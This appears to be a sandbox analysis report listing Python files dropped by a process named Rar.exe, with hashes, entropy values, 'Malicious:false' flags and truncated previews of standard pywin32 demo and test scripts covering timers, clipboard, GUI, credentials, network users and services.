                                                                                                                                                                                      Preview:# -*- Mode: Python; tab-width: 4 -*-.#..# This module, and the timer.pyd core timer support, were written by.# Sam Rushing (rushing@nightmare.com)..import time..# Timers are based on Windows messages. So we need.# to do the event-loop thing!.import timer.import win32event.import win32gui..# glork holds a simple counter for us....class glork:. def __init__(self, delay=1000, max=10):. self.x = 0. self.max = max. self.id = timer.set_timer(delay, self.increment). # Could use the threading module, but this is. # a win32 extension test after all! :-). self.event = win32event.CreateEvent(None, 0, 0, None).. def increment(self, id, time):. print("x = %d" % self.x). self.x = self.x + 1. # if we've reached the max count,. # kill off the timer.. if self.x > self.max:. # we could have used 'self.id' here, too. timer.kill_timer(id). win32event.SetEvent(self.event)...# create a counte
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4666
                                                                                                                                                                                      Entropy (8bit):4.668774222762782
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:SvkHtf4HomAM/yjHGnav57yjKATlbbnonaYBPYbhkw9zCa/qSbNzw1z:S+f4Im3cGn67P43onYhL9vVxs
                                                                                                                                                                                      MD5:DB58629AA113EDAC46DE260EBFBAD2BE
                                                                                                                                                                                      SHA1:3C51C981260093C562341E841C532C315F333C8C
                                                                                                                                                                                      SHA-256:D8492408E4957D3AA6C2F828E516537A5001890243BDF1F07570D22EA070CEDF
                                                                                                                                                                                      SHA-512:FEB1C5F901E6E6CF1E1C5E0F98C5FC545EF2590CB3406C34CF2A774A46002571E5C1C6A36A3F5A0D544BB594333776653B1E8C6CF1B12AF9BFB6C805CF8295CA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# win32clipboardDemo.py.#.# Demo/test of the win32clipboard module...import win32con.from pywin32_testutil import str2bytes # py3k-friendly helper.from win32clipboard import *..if not __debug__:. print("WARNING: The test code in this module uses assert"). print("This instance of Python has asserts disabled, so many tests will be skipped")..cf_names = {}.# Build map of CF_* constants to names..for name, val in list(win32con.__dict__.items()):. if name[:3] == "CF_" and name != "CF_SCREENFONTS": # CF_SCREEN_FONTS==CF_TEXT!?!?. cf_names[val] = name...def TestEmptyClipboard():. OpenClipboard(). try:. EmptyClipboard(). assert (. EnumClipboardFormats(0) == 0. ), "Clipboard formats were available after emptying it!". finally:. CloseClipboard()...def TestText():. OpenClipboard(). try:. text = "Hello from Python". text_bytes = str2bytes(text). SetClipboardText(text). got = GetClipboardData(win32co
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3905
                                                                                                                                                                                      Entropy (8bit):4.396194918375346
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:iOMbbuK52jUCVYqT7jQ3eGi+KL44cd12xXtACc2eGzqQ3mRsG4m:ihbbeBVN7jyi+KU4Ju2usGv
                                                                                                                                                                                      MD5:258A699983426F66EB6440D4B1E0D34E
                                                                                                                                                                                      SHA1:026B32F8A76C1B6F955EAB426AE3597ED4FCDF09
                                                                                                                                                                                      SHA-256:905279066C8F55C7BC6376D4B583918BB5CEE1547E37B8328245112EA1155C1B
                                                                                                                                                                                      SHA-512:F3DC2BC0EEBA1B3812AA9BF7FB16D2F882FE252E718219C88628E0BE10247156733A09F6928C9044760A0492906E490A286FC1084CCAD5BF0ABC09B37E491E8B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import win32api.import win32clipboard.import win32con.import win32gui...class ViewerWindow:. def __init__(self):. self.hwndNextViewer = None.. def OnPaint(self, hwnd, msg, wp, lp):. dc, ps = win32gui.BeginPaint(hwnd). wndrect = win32gui.GetClientRect(hwnd). wndwidth = wndrect[2] - wndrect[0]. wndheight = wndrect[3] - wndrect[1]. win32clipboard.OpenClipboard(). try:. try:. hbitmap = win32clipboard.GetClipboardData(win32clipboard.CF_BITMAP). except TypeError:. font = win32gui.LOGFONT(). font.lfHeight = 15 # int(wndheight/20). font.lfWidth = 15 # font.lfHeight. # font.lfWeight=150. hf = win32gui.CreateFontIndirect(font). win32gui.SelectObject(dc, hf). win32gui.SetBkMode(dc, win32con.TRANSPARENT). win32gui.SetTextColor(dc, win32api.RGB(0, 0, 0)). win32gu
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5536
                                                                                                                                                                                      Entropy (8bit):4.562610287492588
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:LAmlRZGu6O+K3Yf5ssjT0ALmjgriErdNTm5GD+TtXN4Brr:LybK3YhssPDKjgriEr3i5/tdk/
                                                                                                                                                                                      MD5:3A3B78735045BCDA323C1454A8A6524F
                                                                                                                                                                                      SHA1:2E9A0AB51D615E7717C8ED3A51A8AA24D3975F5C
                                                                                                                                                                                      SHA-256:5E8F4A7A26DF3EECFABAF58DF88E291C1A90EC87DCB40C51123E006832C82D89
                                                                                                                                                                                      SHA-512:235B679DCE556F5F9CCBDF995EDDCC43019098284B9D8342CA1940F6BBBEE658148AD519B3E29BF70490E1B3521242F5CC1BD03B977F4D760FF89A1EFFE0E0A6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# This is a simple serial port terminal demo..#.# Its primary purpose is to demonstrate the native serial port access offered via.# win32file...# It uses 3 threads:.# - The main thread, which cranks up the other 2 threads, then simply waits for them to exit..# - The user-input thread - blocks waiting for a keyboard character, and when found sends it.# out the COM port. If the character is Ctrl+C, it stops, signalling the COM port thread to stop..# - The COM port thread is simply listening for input on the COM port, and prints it to the screen...# This demo uses userlapped IO, so that none of the read or write operations actually block (however,.# in this sample, the very next thing we do _is_ block - so it shows off the concepts even though it.# doesnt exploit them...import msvcrt # For the getch() function..import sys.import threading..import win32con # constants..from win32event import * # We use events and the WaitFor[Multiple]Objects functions..from win32file import * # The
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5109
                                                                                                                                                                                      Entropy (8bit):4.7421972636330745
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:fJUKEFxFgO1PPfJM7FxFgyFtF9VCFGFJFxFZFtFuFHFSFr:nE75fG77Wyv9Cg/3PbgFsR
                                                                                                                                                                                      MD5:867D26ABCB67E383F5648184D67E050B
                                                                                                                                                                                      SHA1:B7030E5399DA5BD59F903CB050D8812346C4BEAB
                                                                                                                                                                                      SHA-256:5361F5BF72F2598DCB4D505A1C74D969A12A96EF80FA14F00AB8E1FD63AF2152
                                                                                                                                                                                      SHA-512:A8BD3C68FF367C9036A8A20A15465E3404A646F5639D8AE30E14335C72C511E008816A0325FE40C4FC37A662FC6B894AFFBC01AC248FF98A482056A8CF53CFC2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import time..import win32con.import win32console..virtual_keys = {}.for k, v in list(win32con.__dict__.items()):. if k.startswith("VK_"):. virtual_keys[v] = k..free_console = True.try:. win32console.AllocConsole().except win32console.error as exc:. if exc.winerror != 5:. raise. ## only free console if one was created successfully. free_console = False..stdout = win32console.GetStdHandle(win32console.STD_OUTPUT_HANDLE).stdin = win32console.GetStdHandle(win32console.STD_INPUT_HANDLE).newbuffer = win32console.CreateConsoleScreenBuffer().newbuffer.SetConsoleActiveScreenBuffer().newbuffer.SetConsoleTextAttribute(. win32console.FOREGROUND_RED. | win32console.FOREGROUND_INTENSITY. | win32console.BACKGROUND_GREEN. | win32console.BACKGROUND_INTENSITY.).newbuffer.WriteConsole("This is a new screen buffer\n")..## test setting screen buffer and window size.## screen buffer size cannot be smaller than window size.window_size = newbuffer.GetConsoleScreenBuffe
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2747
                                                                                                                                                                                      Entropy (8bit):5.085452982327908
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:cfg1SDMmh+nJ2e5bke5RnBzgm5go7Nke4VeLWeNPRLe712kDACXjLtPCPpyDku+h:kg1dgoJ22kPo7qlVeWYPRLk1PDACzpCb
                                                                                                                                                                                      MD5:B2DD13257D87B2D861BAD12F9BE7D17B
                                                                                                                                                                                      SHA1:B48DFABE4E44059CF9DDB076382928CA891189D3
                                                                                                                                                                                      SHA-256:E68685BDC90CC014E4AA3BA4F6FC988E945F576A35DEB2BFFD1C69B06C30F7F8
                                                                                                                                                                                      SHA-512:3A59D0B5DCBFB5C325338B5BFD398E2E289805D2B2C3B43DE7DD2951D1A1444C032CDE2EA2F962B01EC93BB49279064269DF07BCA24DEF9160418C2E0A5852E8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""".Demonstrates prompting for credentials, saving, and loggging on with marshalled credential..Also shows how to load user's profile."""..import win32api.import win32con.import win32cred.import win32net.import win32profile.import win32security..## Prompt for a username/pwd for local computer.uiinfo = {. "MessageText": "Enter credentials for local machine",. "CaptionText": "win32cred_demo.py",.}.target, pwd, save = win32cred.CredUIPromptForCredentials(. TargetName=win32api.GetComputerName(),. AuthError=0,. Flags=win32cred.CREDUI_FLAGS_DO_NOT_PERSIST. | win32cred.CREDUI_FLAGS_SHOW_SAVE_CHECK_BOX,. Save=False,. UiInfo=uiinfo,.)..attrs = [. {"Keyword": "attr1", "Flags": 0, "Value": "unicode data"},. {"Keyword": "attr2", "Flags": 0, "Value": b"character data"},.].cred = {. "Comment": "Created by win32cred_demo.py",. "UserName": target,. "TargetAlias": None,. "TargetName": target,. "CredentialBlob": pwd,. "Flags": win32cred.CRED_FLAGS_USERNAME
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1381
                                                                                                                                                                                      Entropy (8bit):4.808237224456068
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:qIRznj1ZjkzgY87MNgghZU+7Vx/YhVwfTDw/LsnOEw3a5dDTVtpYPGPdDTG/b1db:dLkz0gNghK/vfTkPK/Vr0bHh7Os
                                                                                                                                                                                      MD5:E7B5B82C93BC5D6291AE5E98FEFE6773
                                                                                                                                                                                      SHA1:277255439133F6941FCB2BEBEBFFC3020AB9DEBA
                                                                                                                                                                                      SHA-256:4D203DB1FC60406DAAD07C19BDFA3F52A71B7D16E25BA0D56CCCD2818497AD87
                                                                                                                                                                                      SHA-512:6C0BE979ED9D3B394244679413F7C5EDAD3D4309417B5E1AD82273AE2E2668BBE05407298BBD3A9BEEC85D6A7B3F3D92DDE37009E86588CD7CEF37E17EC56816
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# This is a "demo" of win32file - it used to be more a test case than a.# demo, so has been moved to the test directory...import os..# Please contribute your favourite simple little demo..import win32api.import win32con.import win32file...# A very simple demo - note that this does no more than you can do with.# builtin Python file objects, so for something as simple as this, you.# generally *should* use builtin Python objects. Only use win32file etc.# when you need win32 specific features not available in Python..def SimpleFileDemo():. testName = os.path.join(win32api.GetTempPath(), "win32file_demo_test_file"). if os.path.exists(testName):. os.unlink(testName). # Open the file for writing.. handle = win32file.CreateFile(. testName, win32file.GENERIC_WRITE, 0, None, win32con.CREATE_NEW, 0, None. ). test_data = "Hello\0there".encode("ascii"). win32file.WriteFile(handle, test_data). handle.Close(). # Open it for reading.. handle = win32file.Cre
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5028
                                                                                                                                                                                      Entropy (8bit):4.86015472894631
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:otvodpuc/LMExtDYu57+AJATWADoFpW2b/IL2JeieSvqE:Kvvc/Ljl5TFpW2b/IL2JeieSvqE
                                                                                                                                                                                      MD5:B8AB179A28507872DFD508DF57A317E7
                                                                                                                                                                                      SHA1:CB997291BEBC67B828994AEDED8944D25CF66445
                                                                                                                                                                                      SHA-256:4619866C59EEF14BDB582B8A48CC18CCD75E67C2F64913C805B5A3C930BB2C4B
                                                                                                                                                                                      SHA-512:21008AA2DD1695D584694C0E5D59DF0A341DA592D12FCD44F70F754F22D999BEA2A96B5AE735724EC21A9BC72E20DF7EE31824D2101F8036BF66396BAF3AA9C5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# The start of a win32gui generic demo..# Feel free to contribute more demos back ;-)..import math.import random.import time..import win32api.import win32con.import win32gui...def _MyCallback(hwnd, extra):. hwnds, classes = extra. hwnds.append(hwnd). classes[win32gui.GetClassName(hwnd)] = 1...def TestEnumWindows():. windows = []. classes = {}. win32gui.EnumWindows(_MyCallback, (windows, classes)). print(. "Enumerated a total of %d windows with %d classes". % (len(windows), len(classes)). ). if "tooltips_class32" not in classes:. print("Hrmmmm - I'm very surprised to not find a 'tooltips_class32' class.")...def OnPaint_1(hwnd, msg, wp, lp):. dc, ps = win32gui.BeginPaint(hwnd). win32gui.SetGraphicsMode(dc, win32con.GM_ADVANCED). br = win32gui.CreateSolidBrush(win32api.RGB(255, 0, 0)). win32gui.SelectObject(dc, br). angle = win32gui.GetWindowLong(hwnd, win32con.GWL_USERDATA). win32gui.SetWindowLong(hwnd, win32con.GWL_USERDA
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3829
                                                                                                                                                                                      Entropy (8bit):5.010125673110548
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:quG+AnP3C0axcdbC6DemA2FqcxD2/nccvjXHVFKOw/mo5GyG0:quEPSXOG6DemA2Fq47U7HVFxw/mw/
                                                                                                                                                                                      MD5:F78AB5C17E8D69884B433067B37A478A
                                                                                                                                                                                      SHA1:F390AF6B0116C94F3C837C54437109D91A4E3074
                                                                                                                                                                                      SHA-256:3D09EAC656558AB7799B73B83AF3F3CA14756296B93269CE6DD9A20EBAC61E95
                                                                                                                                                                                      SHA-512:ED028D0514998FD26BCEE418234872A82014506EBE494F782D6AA094F59E7D1894004EB463373DCA9E0349C5E3FD79E2EB52AA9669D4943C3058333C9A7FD9C8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Demo RegisterDeviceNotification etc. Creates a hidden window to receive.# notifications. See serviceEvents.py for an example of a service doing.# that..import sys.import time..import win32api.import win32con.import win32file.import win32gui.import win32gui_struct.import winnt..# These device GUIDs are from Ioevent.h in the Windows SDK. Ideally they.# could be collected somewhere for pywin32....GUID_DEVINTERFACE_USB_DEVICE = "{A5DCBF10-6530-11D2-901F-00C04FB951ED}"...# WM_DEVICECHANGE message handler..def OnDeviceChange(hwnd, msg, wp, lp):. # Unpack the 'lp' into the appropriate DEV_BROADCAST_* structure,. # using the self-identifying data inside the DEV_BROADCAST_HDR.. info = win32gui_struct.UnpackDEV_BROADCAST(lp). print("Device change notification:", wp, str(info)). if (. wp == win32con.DBT_DEVICEQUERYREMOVE. and info.devicetype == win32con.DBT_DEVTYP_HANDLE. ):. # Our handle is stored away in the structure - just close it. print("De
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):15720
                                                                                                                                                                                      Entropy (8bit):4.774516514388496
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:lptehicVSsdWi2Glkdqfn9NvWevP2RkypmcZJeA:lHuiYn/+7RWcZJeA
                                                                                                                                                                                      MD5:7FE3A04708C7BFC598956C5E83EF9031
                                                                                                                                                                                      SHA1:1A01D40A3DFAD3D6B8B14570CCCB92B7DBAE4F20
                                                                                                                                                                                      SHA-256:95D3AC68ED6E7E5770E33AF40A1A6FD2A805EE9223D53624ED42FD6AEDAE0FAA
                                                                                                                                                                                      SHA-512:6241EDA928BF49A34049818555A4F9897ADFA894612B1285463FC28DEC0A2AD387051DB02E002109AB8A675C1F7287E1908F67D1213F2F438CC5CEB190E507F7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# A demo of a fairly complex dialog..#.# Features:.# * Uses a "dynamic dialog resource" to build the dialog..# * Uses a ListView control..# * Dynamically resizes content..# * Uses a second worker thread to fill the list..# * Demostrates support for windows XP themes...# If you are on Windows XP, and specify a '--noxp' argument, you will see:.# * alpha-blend issues with icons.# * The buttons are "old" style, rather than based on the XP theme..# Hence, using:.# import winxpgui as win32gui.# is recommended..# Please report any problems..import sys..if "--noxp" in sys.argv:. import win32gui.else:. import winxpgui as win32gui..import array.import os.import queue.import struct..import commctrl.import win32api.import win32con.import win32gui_struct.import winerror..IDC_SEARCHTEXT = 1024.IDC_BUTTON_SEARCH = 1025.IDC_BUTTON_DISPLAY = 1026.IDC_LISTBOX = 1027..WM_SEARCH_RESULT = win32con.WM_USER + 512.WM_SEARCH_FINISHED = win32con.WM_USER + 513...class _WIN32MASKEDSTRUCT:. def __init__
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):16112
                                                                                                                                                                                      Entropy (8bit):4.611080780743955
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:kIV+2THm+d4iG1UGf2HmlL16Idc8uITjPjvfEEgIBXFNXIDz29AJ5JSIbB6BOnUy:kGHLy1UNmlLQkgEgI1SzMI5LbB6BOv
                                                                                                                                                                                      MD5:2DD553D7A4EB19590D28DB62428B4D46
                                                                                                                                                                                      SHA1:B391B8AFAE0A41869680637C0C2D549787B2A244
                                                                                                                                                                                      SHA-256:6F6DF0AEDB7AE4CC0DA6A063CBB8A94A1333A0650B0DD016B20CCE37C9BAA7D8
                                                                                                                                                                                      SHA-512:675A5D0192ED09F1FB8882BFEEAC907B75B0F61E53B1B0BE11B8E502BD417966AC79858706B32B088BA668B8BCE2B6CCFB0D70497291A6C67F7D4CCB2BB2C306
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Demonstrates some advanced menu concepts using win32gui..# This creates a taskbar icon which has some fancy menus (but note that.# selecting the menu items does nothing useful - see win32gui_taskbar.py.# for examples of this...# NOTE: This is a work in progress. Todo:.# * The "Checked" menu items don't work correctly - I'm not sure why..# * No support for GetMenuItemInfo...# Based on Andy McKay's demo code..from win32api import *..# Try and use XP features, so we get alpha-blending etc..try:. from winxpgui import *.except ImportError:. from win32gui import *..import array.import os.import struct.import sys..import win32con.from win32gui_struct import *..this_dir = os.path.split(sys.argv[0])[0]...class MainWindow:. def __init__(self):. message_map = {. win32con.WM_DESTROY: self.OnDestroy,. win32con.WM_COMMAND: self.OnCommand,. win32con.WM_USER + 20: self.OnTaskbarNotify,. # owner-draw related handlers.. win32con.W
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5206
                                                                                                                                                                                      Entropy (8bit):4.754958557193041
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:T9gvS0tVbYFk45y2aR6tgHtZGtX8kemI4sBKzmrHIwi:B+tVq7Y2aRHwvI4sQzvwi
                                                                                                                                                                                      MD5:BD7764F8D17FFCA4629B558458642734
                                                                                                                                                                                      SHA1:AD2FFDCE97F8A154C6809CA6EA9376CE5DAEBFB3
                                                                                                                                                                                      SHA-256:3203AB7E1D178EFBFA1AB964B3A010884E6BD86720DD0F55A6DC9D1243F49F5E
                                                                                                                                                                                      SHA-512:BFF7B59948A1D044CBB311728C95F58E28EE3E177164650BEAE232DB100E3898BA82B538852A139A2621ADB48F2BF0754332B3B506AE5E9A801A04141971EF53
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Creates a task-bar icon. Run from Python.exe to see the.# messages printed..import os.import sys..import win32api.import win32con.import win32gui.import winerror...class MainWindow:. def __init__(self):. msg_TaskbarRestart = win32gui.RegisterWindowMessage("TaskbarCreated"). message_map = {. msg_TaskbarRestart: self.OnRestart,. win32con.WM_DESTROY: self.OnDestroy,. win32con.WM_COMMAND: self.OnCommand,. win32con.WM_USER + 20: self.OnTaskbarNotify,. }. # Register the Window class.. wc = win32gui.WNDCLASS(). hinst = wc.hInstance = win32api.GetModuleHandle(None). wc.lpszClassName = "PythonTaskbarDemo". wc.style = win32con.CS_VREDRAW | win32con.CS_HREDRAW. wc.hCursor = win32api.LoadCursor(0, win32con.IDC_ARROW). wc.hbrBackground = win32con.COLOR_WINDOW. wc.lpfnWndProc = message_map # could also specify a wndproc... # Don't blow up if class already registered
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8984
                                                                                                                                                                                      Entropy (8bit):4.399025941579387
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:ITaxEtPTFlOLG2zaBxuzJJXKz2MP7EKavZ8ozm/9UOGHjm35lmSV7b66wN6ChcEi:ImxEZTSEMT+28Fonw9x9ljYp1XC/Wxli
                                                                                                                                                                                      MD5:380BD910ADE57D5EED72B6D8CE27AF8C
                                                                                                                                                                                      SHA1:AF570E6EACEC750D47905AD0ED08A3BFC3B916A5
                                                                                                                                                                                      SHA-256:04E8DC68E6C79B52F87B0AB5A1F4112AB57BFFCFB4C57D3D2D645623C23D665B
                                                                                                                                                                                      SHA-512:93C47071AAF180C5F4E0A6BF9BF581F7EE8593F23933450C0A06D60DEC3DB03974EE9472AD3E2899975336633BAC4A69698B91BB8A22CE2701A3D7E02460A802
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import getopt.import sys.import traceback..import win32api.import win32net.import win32netcon.import win32security..verbose_level = 0..server = None # Run on local machine....def verbose(msg):. if verbose_level:. print(msg)...def CreateUser():. "Creates a new test user, then deletes the user". testName = "PyNetTestUser". try:. win32net.NetUserDel(server, testName). print("Warning - deleted user before creating it!"). except win32net.error:. pass.. d = {}. d["name"] = testName. d["password"] = "deleteme". d["priv"] = win32netcon.USER_PRIV_USER. d["comment"] = "Delete me - created by Python test code". d["flags"] = win32netcon.UF_NORMAL_ACCOUNT | win32netcon.UF_SCRIPT. win32net.NetUserAdd(server, 1, d). try:. try:. win32net.NetUserChangePassword(server, testName, "wrong", "new"). print("ERROR: NetUserChangePassword worked with a wrong password!"). except win32net.error:. pas
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2809
                                                                                                                                                                                      Entropy (8bit):4.910903276980213
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:qv5dZhR3kNn5VCOYPy4GQ+zSO3I6fmBUDNiKjt6kOVp1JqUTD:qlR3e5Va64GQW3IUEUDN/ckkwUv
                                                                                                                                                                                      MD5:CD8D88B9E04BD140A2CE1C48E899A250
                                                                                                                                                                                      SHA1:7AE9354E81A559AE2C28E624BF2419CE12F6933D
                                                                                                                                                                                      SHA-256:70D08CC0A5E47530DA0E45F975264B795A8473B6A2646593041F527DC2661CA0
                                                                                                                                                                                      SHA-512:6E1E5EB57AF9AD39B51B01EC6CD0A923615B80C5D5D4490792057B3C551050B16C8584196B058E6DB48616F195552332534DD758AA5D99E062C8919D2379652C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# A demo of the win32rcparser module and using win32gui..import os..import commctrl.import win32api.import win32con.import win32gui.import win32rcparser..this_dir = os.path.abspath(os.path.dirname(__file__)).g_rcname = os.path.abspath(. os.path.join(this_dir, "..", "test", "win32rcparser", "test.rc").)..if not os.path.isfile(g_rcname):. raise RuntimeError("Can't locate test.rc (should be at '%s')" % (g_rcname,))...class DemoWindow:. def __init__(self, dlg_template):. self.dlg_template = dlg_template.. def CreateWindow(self):. self._DoCreate(win32gui.CreateDialogIndirect).. def DoModal(self):. return self._DoCreate(win32gui.DialogBoxIndirect).. def _DoCreate(self, fn):. message_map = {. win32con.WM_INITDIALOG: self.OnInitDialog,. win32con.WM_CLOSE: self.OnClose,. win32con.WM_DESTROY: self.OnDestroy,. win32con.WM_COMMAND: self.OnCommand,. }. return fn(0, self.dlg_template, 0, message_m
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):579
                                                                                                                                                                                      Entropy (8bit):4.864055610075746
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:4L/LeAgAYADWcC1DuJ4ilQw+47lgrwS4pLpvn:dAtCceDuJrQd4pQn4pLpvn
                                                                                                                                                                                      MD5:EE907338D6390DF677EB03E8B8EC1086
                                                                                                                                                                                      SHA1:E374C563078378EC5C4F69797569ACBFFEB0D51B
                                                                                                                                                                                      SHA-256:8B4ED673B62CF16AE39C308739A39C3B14BB3B567E85CE59224451041D0F5EEC
                                                                                                                                                                                      SHA-512:48D03393639F46EFAFAA42A22430AD9056D35C943FDD84C235A37C0774C95DB26CD5F07E0582753DC051E81AC56744980A7260DE8BBCCE7A0B3327CAC2BA9412
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import win32con.import win32service...def EnumServices():. resume = 0. accessSCM = win32con.GENERIC_READ. accessSrv = win32service.SC_MANAGER_ALL_ACCESS.. # Open Service Control Manager. hscm = win32service.OpenSCManager(None, None, accessSCM).. # Enumerate Service Control Manager DB.. typeFilter = win32service.SERVICE_WIN32. stateFilter = win32service.SERVICE_STATE_ALL.. statuses = win32service.EnumServicesStatus(hscm, typeFilter, stateFilter). for short_name, desc, status in statuses:. print(short_name, desc, status)...EnumServices().
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):982
                                                                                                                                                                                      Entropy (8bit):4.754642610339019
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:SIGvZ5wLuzL7SZBqSKBkd9ovyNl3gfFyuxU2NYT4oan0ux/9duzU7gflQlyqTkd4:GvZ5VSZISVdOyaNn06dT0flQAdyCYsL6
                                                                                                                                                                                      MD5:0C05782F9271A7CC8A5C02ECC2038C5C
                                                                                                                                                                                      SHA1:2939D4168D724A07F9B9DDCFF507A33F208FE2A1
                                                                                                                                                                                      SHA-256:28E8F3FAF3572494B50DB3B26A200F7A8589AC135CA8A8661AC3FCA999CC2A00
                                                                                                                                                                                      SHA-512:84CA26CD7A55D2427C96400B90E2C781786C68396A7E240CA7A2F212894CB44B12F4BBDC4F57B9772628A7C204AD6F2039B1D22D4DE867DB3C3ED4C941275912
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
